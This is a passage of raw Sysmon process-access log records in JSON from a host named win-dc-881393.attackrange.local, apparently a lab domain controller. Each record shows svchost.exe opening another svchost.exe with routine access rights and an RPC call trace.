ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":961,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":962,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":963,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":964,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":965,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":966,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":967,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":968,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 